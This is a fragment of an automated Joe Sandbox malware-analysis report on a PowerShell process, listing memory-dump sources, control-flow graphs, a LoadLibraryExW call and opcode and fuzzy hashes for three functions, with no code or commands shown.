                                                                                                  • Source File: 00000008.00000002.2562715293.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ff848e80000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: 82a1ceb89a5544d0c9200986c4d33d9187816ccc276c8bff7cd0b52e266cf766
                                                                                                  • Instruction ID: e4ae137b7b742bb755838c0e4f4f65002911a2d00e13b4a24c3c081d17308f8f
                                                                                                  • Opcode Fuzzy Hash: 82a1ceb89a5544d0c9200986c4d33d9187816ccc276c8bff7cd0b52e266cf766
                                                                                                  • Instruction Fuzzy Hash: 8F31C43190CA5C9FDB59DBA89849BE9BBE0FF66321F04422BD009D3252DB74A845CB91
                                                                                                  Function 00007FF848E9664A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 109 7ff848e9664a-7ff848e96caf 112 7ff848e96cb1-7ff848e96cb6 109->112 113 7ff848e96cb9-7ff848e96ceb LoadLibraryExW 109->113 112->113 114 7ff848e96cf3-7ff848e96d1a 113->114 115 7ff848e96ced 113->115 115->114
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2562715293.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ff848e80000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: a4e819b4cae66ff286398058dfd787efb72bf10226d3399080d5bbc48d00a34f
                                                                                                  • Instruction ID: 699593f1123f040302576e13749d2efa406b88e9eb2ce5740afa560035456f26
                                                                                                  • Opcode Fuzzy Hash: a4e819b4cae66ff286398058dfd787efb72bf10226d3399080d5bbc48d00a34f
                                                                                                  • Instruction Fuzzy Hash: B1217E7190CA1C9FDB58DB989849BF9BBE0FB69321F00822FD00AD3651DB71A4458B91
                                                                                                  Function 00007FF848F533D5 Relevance: .4, Instructions: 442COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 239 7ff848f533d5-7ff848f53464 243 7ff848f536cc-7ff848f5378b 239->243 244 7ff848f5346a-7ff848f53474 239->244 245 7ff848f5348d-7ff848f53492 244->245 246 7ff848f53476-7ff848f53483 244->246 248 7ff848f53498-7ff848f5349b 245->248 249 7ff848f53670-7ff848f5367a 245->249 246->245 251 7ff848f53485-7ff848f5348b 246->251 254 7ff848f5349d-7ff848f534b0 248->254 255 7ff848f534b2 248->255 252 7ff848f5367c-7ff848f53688 249->252 253 7ff848f53689-7ff848f536c9 249->253 251->245 253->243 258 7ff848f534b4-7ff848f534b6 254->258 255->258 258->249 261 7ff848f534bc-7ff848f534f0 258->261 272 7ff848f53507 261->272 273 7ff848f534f2-7ff848f53505 261->273 276 7ff848f53509-7ff848f5350b 272->276 273->276 276->249 277 7ff848f53511-7ff848f53519 276->277 277->243 279 7ff848f5351f-7ff848f53529 277->279 280 7ff848f5352b-7ff848f53543 279->280 281 7ff848f53545-7ff848f53555 279->281 280->281 281->249 285 7ff848f5355b-7ff848f5358c 281->285 285->249 290 7ff848f53592-7ff848f535bb 285->290 294 7ff848f535bc-7ff848f535be 290->294 295 7ff848f535e9 294->295 296 7ff848f535c0-7ff848f535e0 294->296 297 7ff848f535eb-7ff848f535ed 295->297 296->294 302 7ff848f535e2 296->302 297->249 298 7ff848f535f3-7ff848f535fb 297->298 300 7ff848f535fd-7ff848f53607 298->300 301 7ff848f5360b 298->301 303 7ff848f53609 300->303 304 7ff848f53627-7ff848f5363c 300->304 307 7ff848f53610-7ff848f53625 301->307 305 7ff848f535e4-7ff848f535e7 302->305 306 7ff848f53641-7ff848f53656 302->306 303->307 304->306 305->297 312 7ff848f5365d-7ff848f5366f 306->312 307->304
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2563401995.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ff848f50000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 19499dc0028d48ceecd3c9e1a0ae0cd28fafb819cea9874527c101c67fe98144
                                                                                                  • Instruction ID: 7f79957024eb49cf8f037a1b9ed6cd8e8a7a0c19251a80765086ce60f85edf9c
                                                                                                  • Opcode Fuzzy Hash: 19499dc0028d48ceecd3c9e1a0ae0cd28fafb819cea9874527c101c67fe98144
                                                                                                  • Instruction Fuzzy Hash: 9DD12331E1EA8A5FE796AB2C98559B5FBE0EF16390F4800FED04DC71D3EA18A805C355